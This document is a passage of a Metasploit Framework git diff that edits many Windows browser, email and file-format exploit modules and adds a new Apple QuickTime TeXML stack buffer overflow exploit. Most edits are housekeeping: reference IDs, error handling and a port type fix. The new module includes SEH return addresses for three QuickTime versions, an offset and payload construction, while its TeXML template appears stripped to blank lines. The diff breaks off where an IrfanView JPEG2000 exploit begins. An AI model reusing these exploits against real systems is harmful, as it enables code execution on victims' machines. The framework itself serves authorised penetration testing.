index 1aa6e54043..d0e9086ad9 100644
--- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
+++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/barcode_ax49.rb b/modules/exploits/windows/browser/barcode_ax49.rb
index 7981247028..dc30d37e03 100644
--- a/modules/exploits/windows/browser/barcode_ax49.rb
+++ b/modules/exploits/windows/browser/barcode_ax49.rb
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
- [ 'URL', 'http://www.milw0rm.com/exploits/4094' ],
+ [ 'EDB', '4094' ],
[ 'OSVDB', '37482' ],
[ 'BID', '24596' ],
[ 'CVE', '2007-3435' ],
diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
index 7b66cf0522..d0262769f4 100644
--- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
+++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
url = "http://"
url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- url += ":" + datastore['SRVPORT'] + get_resource() + "/"
+ url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
#VBScript variables
clsid = "79956462-F148-497F-B247-DF35A095F80B"
diff --git a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
index 9169c668b8..8afddb8464 100644
--- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
+++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/#{@payload_rand}"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/#{@payload_rand}"
if (request.uri.match(/#{@payload_rand}/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/dxstudio_player_exec.rb b/modules/exploits/windows/browser/dxstudio_player_exec.rb
index a533fed09f..674d6f1b03 100644
--- a/modules/exploits/windows/browser/dxstudio_player_exec.rb
+++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
url_base = "http://"
url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- url_base += ":" + datastore['SRVPORT'] + get_resource()
+ url_base += ":" + datastore['SRVPORT'].to_s + get_resource()
payload_url = url_base + "/payload"
diff --git a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
index de9261004d..1c5d02f04c 100644
--- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
+++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/facebook_extractiptc.rb b/modules/exploits/windows/browser/facebook_extractiptc.rb
index b0d6d4d036..e98bcb89ee 100644
--- a/modules/exploits/windows/browser/facebook_extractiptc.rb
+++ b/modules/exploits/windows/browser/facebook_extractiptc.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2008-5711' ],
[ 'OSVDB', '41073' ],
[ 'BID', '27534' ],
- [ 'URL', 'http://milw0rm.com/exploits/5049' ],
+ [ 'EDB', '5049' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb
index 7e74698376..a56fb1b05c 100644
--- a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb
+++ b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2008-0492'],
[ 'OSVDB', '40762'],
[ 'BID', '27456' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/4987' ],
+ [ 'EDB', '4987' ],
[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059296.html' ],
],
'DefaultOptions' =>
diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
index 940c47a19e..d13793d3e9 100644
--- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
+++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2007-4474' ],
[ 'OSVDB', '40954' ],
[ 'BID', '26972' ],
- [ 'URL', 'http://milw0rm.com/exploits/4820' ],
+ [ 'EDB', '4820' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb
index 4387f7d4d7..37c85a0688 100644
--- a/modules/exploits/windows/browser/java_codebase_trust.rb
+++ b/modules/exploits/windows/browser/java_codebase_trust.rb
@@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
@java_class = fd.read(fd.stat.size)
}
if not @java_class
- raise RuntimeError, "Unable to load java class"
+ fail_with(Exploit::Failure::Unknown, "Unable to load java class")
end
super
diff --git a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
index 54875e68b5..da56d1f1f7 100644
--- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
+++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
@@ -376,7 +376,7 @@ document.location = "#{js_uri}";
#
def exploit
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
super
diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb
index 875c578c13..49030be23c 100644
--- a/modules/exploits/windows/browser/java_ws_vmargs.rb
+++ b/modules/exploits/windows/browser/java_ws_vmargs.rb
@@ -323,7 +323,7 @@ EOS
#
def exploit
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
super
diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb
index bad26f5c4d..7a9d46b7db 100644
--- a/modules/exploits/windows/browser/macrovision_unsafe.rb
+++ b/modules/exploits/windows/browser/macrovision_unsafe.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/mcafee_mvt_exec.rb b/modules/exploits/windows/browser/mcafee_mvt_exec.rb
index 2baddb398e..c4041f4717 100644
--- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb
+++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb
@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ [ 'OSVDB', '81657'],
[ 'EDB', '18805' ]
],
'Payload' =>
diff --git a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb
index f3648425d7..2df9006175 100644
--- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb
@@ -504,7 +504,7 @@ class Metasploit3 < Msf::Exploit::Remote
].pack('v')
else
- raise "Unknown target #{targetr['Method']}"
+ fail_with(Exploit::Failure::NoTarget, "Unknown target #{targetr['Method']}")
end
# Build the ANI file
diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
index 6713d6d3a5..869d94a10d 100644
--- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
+++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb
index 63019a1439..bcf5104e9f 100644
--- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb
+++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb
@@ -316,7 +316,7 @@ MsgBox "Welcome! Press F1 to dismiss this dialog.", ,"Welcome!", "#{unc}", 1
#
def exploit
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
path = File.join(Msf::Config.install_root, "data", "exploits", "runcalc.hlp")
diff --git a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
index 92cf5856b7..4424e550ae 100644
--- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
@@ -341,7 +341,7 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
@img_file = rand_text_alpha(rand(2)+1) + ".gif"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
super
diff --git a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
index 373bfc4fe1..86e7c70bf6 100644
--- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
+++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
@@ -442,7 +442,7 @@ class Metasploit3 < Msf::Exploit::Remote
@exploit_dll = rand_text_alpha(rand(8)+4) + ".dll"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
print_status("Send vulnerable clients to #{@exploit_unc}.")
diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
index 194321e5f8..e46bbcc3ea 100644
--- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
+++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
@@ -422,7 +422,7 @@ EOS
rop_stack.map! { |e|
if e.kind_of? String
# Meta-replace (RVA)
- raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
+ fail_with(Exploit::Failure::BadConfig, "Unable to locate key: \"#{e}\"") if not rvas[e]
rvas['BaseAddress'] + rvas[e]
elsif e == :unused
@@ -447,7 +447,7 @@ EOS
end
def rva2addr(rvas, key)
- raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key]
+ fail_with(Exploit::Failure::BadConfig, "Unable to locate key: \"#{key}\"") if not rvas[key]
rvas['BaseAddress'] + rvas[key]
end
diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb
index 5a4247d8a9..6e10e5a0c7 100644
--- a/modules/exploits/windows/browser/pcvue_func.rb
+++ b/modules/exploits/windows/browser/pcvue_func.rb
@@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
+ [ 'CVE', '2008-4915'],
[ 'BID', '49795'],
[ 'URL', 'http://aluigi.altervista.org/adv/pcvue_1-adv.txt'],
],
diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb
index d652d72cc7..e67ba8b8ea 100644
--- a/modules/exploits/windows/browser/safari_xslt_output.rb
+++ b/modules/exploits/windows/browser/safari_xslt_output.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
url = "http://"
url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- url += ":" + datastore['SRVPORT'] + get_resource() + "/"
+ url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
content = <<-EOS
diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
index c4bc738e43..9e7140bd2f 100644
--- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
+++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/PAYLOAD"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
if (request.uri.match(/PAYLOAD/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
index fe0f55d008..7eff754f6e 100644
--- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
+++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
index 23ad1a2a93..e251f12c07 100644
--- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
+++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/webdav_dll_hijacker.rb b/modules/exploits/windows/browser/webdav_dll_hijacker.rb
index 4bd1b40d62..663f51bb06 100644
--- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb
+++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb
@@ -368,7 +368,7 @@ class Metasploit3 < Msf::Exploit::Remote
@exploit_unc = "\\\\#{myhost}\\"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
print_status("Exploit links are now available at #{@exploit_unc}#{datastore['SHARENAME']}\\")
diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb
index 4d9284c0b0..d3304956d8 100644
--- a/modules/exploits/windows/browser/wmi_admintools.rb
+++ b/modules/exploits/windows/browser/wmi_admintools.rb
@@ -291,7 +291,7 @@ EOS
rop_stack.map! { |e|
if e.kind_of? String
# Meta-replace (RVA)
- raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
+ fail_with(Exploit::Failure::BadConfig, "Unable to locate key: \"#{e}\"") if not rvas[e]
rvas['BaseAddress'] + rvas[e]
elsif e == :unused
@@ -316,7 +316,7 @@ EOS
end
def rva2addr(rvas, key)
- raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key]
+ fail_with(Exploit::Failure::BadConfig, "Unable to locate key: \"#{key}\"") if not rvas[key]
rvas['BaseAddress'] + rvas[key]
end
diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
index 5db120f064..18f7d8171a 100644
--- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
+++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
index 1a8f90c58c..3207600ac7 100644
--- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
+++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
@@ -332,7 +332,7 @@ class Metasploit3 < Msf::Exploit::Remote
@exploit_exe = rand_text_alpha(rand(8)+4) + ".exe"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
msg = Rex::MIME::Message.new
diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb
index eaf2688fd2..e999b8060f 100644
--- a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb
+++ b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb
@@ -330,7 +330,7 @@ class Metasploit3 < Msf::Exploit::Remote
@exploit_exe = rand_text_alpha(rand(8)+4) + ".exe"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
msg = Rex::MIME::Message.new
diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
index 5019a71703..97b43e79e9 100644
--- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
+++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
@@ -79,10 +79,14 @@ class Metasploit3 < Msf::Exploit::Remote
startxrefs = pdf_objects[2]
root_obj = pdf_objects[3]
- output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last)
+ begin
+ output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last)
- print_status("Creating '#{datastore['FILENAME']}' file...")
- file_create(output)
+ print_status("Creating '#{datastore['FILENAME']}' file...")
+ file_create(output)
+ rescue KeyError => e
+ print_error("Incompatible PDF structure: #{e.message}. Please try a different PDF.")
+ end
end
diff --git a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb
new file mode 100644
index 0000000000..e20d673938
--- /dev/null
+++ b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb
@@ -0,0 +1,134 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Apple QuickTime TeXML Style Element Stack Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a vulnerability found in Apple QuickTime. When handling
+ a TeXML file, it is possible to trigger a stack-based buffer overflow, and then
+ gain arbitrary code execution under the context of the user. This is due to the
+ QuickTime3GPP.gtx component not handling certain Style subfields properly, storing
+ user-supplied data on the stack, which results the overflow.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Alexander Gavrun', # Vulnerability Discovery
+ 'sinn3r', # Metasploit Module
+ 'juan vazquez' # Metasploit Module
+ ],
+ 'References' =>
+ [
+ [ 'OSVDB', '81934' ],
+ [ 'CVE', '2012-0663' ],
+ [ 'BID', '53571' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-107/' ],
+ [ 'URL', 'http://support.apple.com/kb/HT1222' ]
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'BadChars' => "\x00\x23\x25\x3c\x3e\x7d"
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'QuickTime 7.7.1 on Windows XP SP3',
+ {
+ 'Ret' => 0x66f1bdf8, # POP ESI/POP EDI/RET from QuickTime.qts (7.71.80.42)
+ 'Offset' => 643,
+ 'Max' => 13508
+ }
+ ],
+ [ 'QuickTime 7.7.0 on Windows XP SP3',
+ {
+ 'Ret' => 0x66F1BD66, # PPR from QuickTime.qts (7.70.80.34)
+ 'Offset' => 643,
+ 'Max' => 13508
+ }
+ ],
+ [ 'QuickTime 7.6.9 on Windows XP SP3',
+ {
+ 'Ret' => 0x66801042, # PPR from QuickTime.qts (7.69.80.9)
+ 'Offset' => 643,
+ 'Max' => 13508
+ }
+ ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'May 15 2012'))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ true, 'The file name.', 'msf.xml']),
+ ], self.class)
+ end
+
+ def exploit
+ my_payload = rand_text(target['Offset'])
+ my_payload << generate_seh_record(target.ret)
+ my_payload << payload.encoded
+ my_payload << rand_text(target['Max'] - my_payload.length)
+
+ texml = <<-eos
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ What you need... Metasploit!
+
+
+
+
+
+ eos
+
+ texml = texml.gsub(/^\t\t/,'')
+
+ print_status("Creating '#{datastore['FILENAME']}'.")
+ file_create(texml)
+ end
+
+end
diff --git a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb
index 8fe97b02ba..57da50d708 100644
--- a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb
+++ b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb
@@ -31,8 +31,8 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2008-5405' ],
[ 'OSVDB', '50342' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/7329' ],
- [ 'BID', '32543' ],
+ [ 'EDB', '7329' ],
+ [ 'BID', '32543' ]
],
'Payload' =>
{
diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb
index 3876c04d38..c1b15fc9ce 100644
--- a/modules/exploits/windows/fileformat/deepburner_path.rb
+++ b/modules/exploits/windows/fileformat/deepburner_path.rb
@@ -40,9 +40,9 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'BID', '21657' ],
[ 'OSVDB', '32356' ],
[ 'CVE', '2006-6665' ],
- [ 'URL', 'http://milw0rm.com/exploits/2950' ],
- [ 'URL', 'http://milw0rm.com/exploits/8335' ],
- [ 'EDB', 11315 ]
+ [ 'EDB', '2950' ],
+ [ 'EDB', '8335' ],
+ [ 'EDB', '11315' ]
],
'Payload' =>
{
diff --git a/modules/exploits/windows/fileformat/destinymediaplayer16.rb b/modules/exploits/windows/fileformat/destinymediaplayer16.rb
index 27b5d41180..537a2ddca5 100644
--- a/modules/exploits/windows/fileformat/destinymediaplayer16.rb
+++ b/modules/exploits/windows/fileformat/destinymediaplayer16.rb
@@ -30,8 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2009-3429' ],
[ 'OSVDB', '53249' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/7651' ],
- [ 'BID', '33091' ],
+ [ 'EDB', '7651' ],
+ [ 'BID', '33091' ]
],
'Payload' =>
{
diff --git a/modules/exploits/windows/fileformat/fatplayer_wav.rb b/modules/exploits/windows/fileformat/fatplayer_wav.rb
index 92ec8c9c59..273a625db8 100644
--- a/modules/exploits/windows/fileformat/fatplayer_wav.rb
+++ b/modules/exploits/windows/fileformat/fatplayer_wav.rb
@@ -35,6 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
+ [ 'CVE', '2009-4962'],
[ 'OSVDB', '57343'],
[ 'EDB', 15279 ],
],
diff --git a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
index 05d117a1cf..3091c8fe17 100644
--- a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
+++ b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
- [ 'OSVDG', '63349' ],
+ [ 'OSVDB', '63349' ],
[ 'EDB', 11975 ], #Initial disclosure
[ 'EDB', 17727 ] #This exploit is based on this poc
],
diff --git a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb
index ccd2b7ee99..aa74b56039 100644
--- a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb
+++ b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb
@@ -40,8 +40,8 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2009-2485' ],
[ 'OSVDB', '55449' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/9034' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/9038' ],
+ [ 'EDB', '9034' ],
+ [ 'EDB', '9038' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
new file mode 100644
index 0000000000..9e7d9fff68
--- /dev/null
+++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
@@ -0,0 +1,216 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::Remote::Egghunter
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow',
+ 'Description' => %q{
